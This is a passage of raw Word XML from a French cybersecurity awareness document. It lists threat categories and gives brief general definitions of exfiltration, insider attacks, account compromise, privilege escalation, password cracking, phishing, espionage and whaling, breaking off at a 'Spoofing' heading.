            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dans la réalité, l’objectif est en fait d’être en mesure de maîtriser ces vulnérabilités plutôt que de viser un objectif 0 inatteignable. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F97841B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_vgzl7qgfychp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="52B3F7C5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_yyjktldaykuy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>2 - Les menaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3512FC" w14:textId="42F069A9" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="58264641" w14:textId="7CBF3C10" w:rsidR="00223B72" w:rsidRDefault="002F1753">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="196458B5" wp14:editId="3D433733">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3408218</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>61232</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1597231" cy="533598"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="Zone de texte 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1597231" cy="533598"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="CCCCCC"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="46224B4D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Violation d’accès non autorisé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458B5" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Zone de texte 9" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:268.35pt;margin-top:4.8pt;width:125.75pt;height:42pt;z-index:2516602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" fillcolor="#ccc" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="46224B4D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Violation d’accès non autorisé </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="0E01F145" wp14:editId="58B6A3F0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>273050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>106268</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1557020" cy="50419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57020" cy="504190"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="F4CCCC"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="42B1D7EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Hameçonnage &amp; ingénierie social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F145" id="Zone de texte 3" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:21.5pt;margin-top:8.35pt;width:122.6pt;height:39.7pt;z-index:251659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" fillcolor="#f4cccc" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="42B1D7EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Hameçonnage &amp; ingénierie sociale</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="02461302" wp14:editId="7714FEE1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1858488</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>108733</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1413164" cy="49876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413164" cy="498764"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="D0E0E3"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0DDE6891" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Fraude intern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1302" id="Zone de texte 5" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:146.35pt;margin-top:8.55pt;width:111.25pt;height:39.25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" fillcolor="#d0e0e3" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="0DDE6891" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Fraude interne </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F621D5B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="020CFB90" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="471B6C13" w14:textId="1F0BD909" w:rsidR="00223B72" w:rsidRDefault="002F1753">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="0135C3B8" wp14:editId="2FC11710">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1038860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>164053</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1545590" cy="4095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1545590" cy="409575"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1F68BD26" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="F3F3F3"/>
                                <w:sz w:val="26"/>
                              </w:rPr>
                              <w:t>Virus Informatiqu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C3B8" id="Zone de texte 17" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:81.8pt;margin-top:12.9pt;width:121.7pt;height:32.25pt;z-index:2516623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" fillcolor="black" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="1F68BD26" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="F3F3F3"/>
                          <w:sz w:val="26"/>
                        </w:rPr>
                        <w:t>Virus Informatique</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="11B9C46A" wp14:editId="2491E8CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2838202</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>160655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2262249" cy="398145"/>
                <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
                <wp:wrapNone/>
                <wp:docPr id="7" name="Zone de texte 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2262249" cy="398145"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="0B5394"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6AFCE09A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="F3F3F3"/>
                                <w:sz w:val="26"/>
                              </w:rPr>
                              <w:t>Déni de service distribué</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="2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C46A" id="Zone de texte 7" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:223.5pt;margin-top:12.65pt;width:178.15pt;height:31.35pt;z-index:2516613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" fillcolor="#0b5394" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="6AFCE09A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="F3F3F3"/>
                          <w:sz w:val="26"/>
                        </w:rPr>
                        <w:t>Déni de service distribué</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="26"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DE78E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6A78E41C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3AD408DA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="665E0455" w14:textId="77777777" w:rsidR="002F1753" w:rsidRDefault="002F1753">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73645547" w14:textId="1D9E8B98" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Exfiltration, fuite, ou suppression de données</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B288CEF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">consiste à copier, transférer, ou supprimer sans autorisation des données hors du domaine. Ce transfert peut être effectué manuellement par une personne ayant accès aux ressources de votre orga, ou bien il peut être automatisé et exécuté par le biais d’un programme malveillant présent sur votre réseau. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3AEAE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4140F472" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EE8BD5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21776317" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Attaque interne malveillante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2134CE" w14:textId="3D658217" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>est commise par un utilisateur ou un administrateur approuvé de votre orga qui organise sciemment le transfert d’informations sensibles en dehors du domaine</w:t>
      </w:r>
      <w:r w:rsidR="002F1753">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Elle peut être le fait d’un employé, d’un ancien employé, d’un prestataire ou d’un partenaire</w:t>
      </w:r>
      <w:r w:rsidR="002F1753">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dans ce type d’attaque, des données peuvent être divulguées via des appareils mobiles dont la sécurité est compromise ou par l’envoi de contenu en </w:t>
      </w:r>
      <w:r w:rsidR="002F1753">
        <w:t>dehors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> du domaine par </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e-mail</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3BFAB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="420CCE46" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="00523464" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Violation de compte </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB09573" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">accès non autorisé au compte d’un utilisateur ou d’un administrateur du domaine. Elle se produit lorsqu’un utilisateur non autorisé dérobe des identifiants de connexion. Dans ce scénario, un compte du domaine est piraté de telle sorte qu’il peut être utilisé par une personne malveillante pour interagir avec des ressources. </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1753">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Le harponnage représente une méthode courante de vol d’identifiants.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dans ce cas, les pirates informatiques envoient frauduleusement un e-mail qui semble provenir d’une personne ou d’une entreprise que vous connaissez et en qui vous avez confiance. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6254AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5056D799" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E99DA41" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Violation de droits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56C900" w14:textId="72ABB58D" w:rsidR="00223B72" w:rsidRDefault="002F1753">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">ait référence au cas </w:t>
      </w:r>
      <w:r>
        <w:t>où</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> une personne malveillante réussit à pirater un ou plusieurs comptes dans votre domaine tente de tirer parti d’autorisations limitées pour accéder à des comptes </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:lastRenderedPageBreak/>
        <w:t>qui disposent d’autorisations plus étendues. Ce type de pirate informatique tente généralement d’accéder à des droits d’admin généraux pour mieux prendre le contrôle des ressources de votre domaine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F69F997" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F98E19C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Cassage de mot de passe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713E9A6" w14:textId="6283EAD5" w:rsidR="00223B72" w:rsidRDefault="00096AD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">st un processus de récupération de mdp qui s’effectue à l’aide d’un logiciel spécialisé et d’une technologie informatique de haute capacité. Les pirates informatiques sont capables de tester de nombreuses combinaisons de mdp dans un court laps de temps. Pour empêcher le piratage de mdp, une stratégie consiste à mettre en œuvre une validation en deux étapes pour les utilisateurs et les administrateurs de votre domaine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F76631" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1813F6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Hameçonnage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C273A6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDB895F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Hameçonnage (Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24320FE1" w14:textId="08257474" w:rsidR="00223B72" w:rsidRDefault="00096AD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L’hameçonnage</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> est une technique de cyberattaque où des attaquants se font passer pour des entités de confiance pour obtenir des informations sensibles (comme des mots de passe et des informations de carte de crédit) via des </w:t>
      </w:r>
      <w:r>
        <w:t>courriels</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>, des messages instantanés ou des sites web falsifiés. Les messages incitent souvent à des actions urgentes et contiennent des liens malveillants ou des pièces jointes infectées.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97E2B6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E12DE4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Attaque par Espionnage (Espionnage Électronique)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA7280" w14:textId="78AFB6DB" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'attaque par espionnage électronique vise à infiltrer des systèmes informatiques pour recueillir des informations confidentielles à des fins de surveillance ou d'avantage compétitif. </w:t>
      </w:r>
      <w:r w:rsidR="00096AD8">
        <w:t>Les cybers espions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ciblent des entreprises, des agences gouvernementales ou des individus avec des informations de grande valeur, utilisant des techniques avancées pour accéder et maintenir une présence discrète dans les réseaux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF756EA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCE349D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Attaque par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Whaling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AC52A33" w14:textId="0BC46DA0" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whaling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ou harponnage, est une forme sophistiquée </w:t>
      </w:r>
      <w:r w:rsidR="00096AD8">
        <w:t>d’hameçonnage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qui cible spécifiquement les hauts dirigeants d'une organisation (comme les PDG et les CFO). Les attaques sont hautement personnalisées et exploitent la position de l'expéditeur supposé pour inciter à des actions telles que des transferts de fonds ou la divulgation d'informations critiques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED12DAD" w14:textId="77777777" w:rsidR="00096AD8" w:rsidRDefault="00096AD8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B4D7DC" w14:textId="7EC4CBF3" w:rsidR="00096AD8" w:rsidRDefault="00096AD8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Spoofing</w:t>
      </w:r>
    </w:p>
